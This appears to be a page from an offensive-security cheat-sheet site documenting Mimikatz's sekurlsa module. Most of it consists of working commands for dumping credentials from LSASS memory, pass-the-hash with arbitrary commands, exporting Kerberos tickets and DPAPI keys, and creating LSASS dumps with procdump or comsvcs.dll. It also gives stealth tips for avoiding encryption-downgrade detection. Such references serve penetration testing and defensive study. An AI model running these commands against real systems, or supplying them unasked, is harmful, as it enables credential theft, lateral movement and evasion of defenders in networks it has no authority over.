🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐱 Mimikatz / sekurlsa

sekurlsa

Extract passwords, keys, PIN codes, and Kerberos tickets from LSASS memory. Requires privilege::debug first (or SYSTEM access).

Prerequisites

mimikatz # privilege::debug
Privilege '20' OK

Without proper access: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

logonpasswords

Dump all cached credentials from all authentication providers (MSV, WDigest, Kerberos, TsPkg, CredMan, SSP).

mimikatz # sekurlsa::logonpasswords

Output includes:
- NTLM hashes (MSV)
- Cleartext passwords (WDigest β€” if enabled)
- Kerberos tickets and keys
- CredSSP credentials

Note: Windows 8+ disables WDigest cleartext caching by default. Passwords appear only when:
- Domain controller is unreachable at logon time
- HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1
- CredSSP delegation is configured

pth β€” Pass-the-Hash

Execute a process using NTLM hash (creates sacrificial logon session, patches LSASS).

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash> [/aes128:<aes128-key>] [/aes256:<aes256-key>] [/run:<command>]

Options

  • /user:<username> β€” username to impersonate
  • /domain:<domain> β€” domain or machine name
  • /ntlm:<nt-hash> β€” NTLM/RC4 hash (mandatory for legacy)
  • /rc4:<rc4> β€” alias for /ntlm
  • /aes128:<aes128-key> β€” optional AES128 key
  • /aes256:<aes256-key> β€” optional AES256 key (use for stealth)
  • /run:<command> β€” command to execute (default: cmd.exe)

Examples

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<nt-hash>
mimikatz # sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<nt-hash> /run:powershell.exe
mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /aes256:<aes256-key>

Requires admin rights β€” opens write handle to LSASS.

tickets

List and optionally export Kerberos tickets from all sessions.

mimikatz # sekurlsa::tickets [/export]
  • /export β€” save each ticket as a .kirbi file on disk

ekeys

Display all Kerberos encryption keys (AES256, AES128, RC4) for all sessions. Useful for obtaining AES keys for stealth over-pass-the-hash.

mimikatz # sekurlsa::ekeys

dpapi

Extract DPAPI master keys from LSASS session memory.

mimikatz # sekurlsa::dpapi

minidump

Redirect sekurlsa commands to work against an LSASS memory dump file instead of the live process.

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

Dump LSASS first (various methods):

# Task Manager: right-click lsass.exe -> Create dump file
# ProcDump:
procdump.exe -ma lsass.exe lsass.dmp
# Comsvcs.dll:
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass-pid> lsass.dmp full

Credential-Specific Subcommands

mimikatz # sekurlsa::msv          # MSV1_0 (NTLM) hashes only
mimikatz # sekurlsa::wdigest      # WDigest cleartext passwords
mimikatz # sekurlsa::kerberos     # Kerberos credentials + smartcard PINs
mimikatz # sekurlsa::tspkg        # Terminal Services (CredSSP) credentials
mimikatz # sekurlsa::credman      # Windows Credential Manager entries
mimikatz # sekurlsa::ssp          # Security Support Provider credentials
mimikatz # sekurlsa::livessp      # LiveSSP credentials
mimikatz # sekurlsa::searchpasswords  # Keyword search in memory for passwords

Notes

  • Credential Guard prevents all credential extraction via sekurlsa
  • sekurlsa::ekeys returns all Kerberos key types β€” use AES256 over RC4 to avoid encryption downgrade detection
  • When using against a minidump, must specify the dump file path before running other sekurlsa commands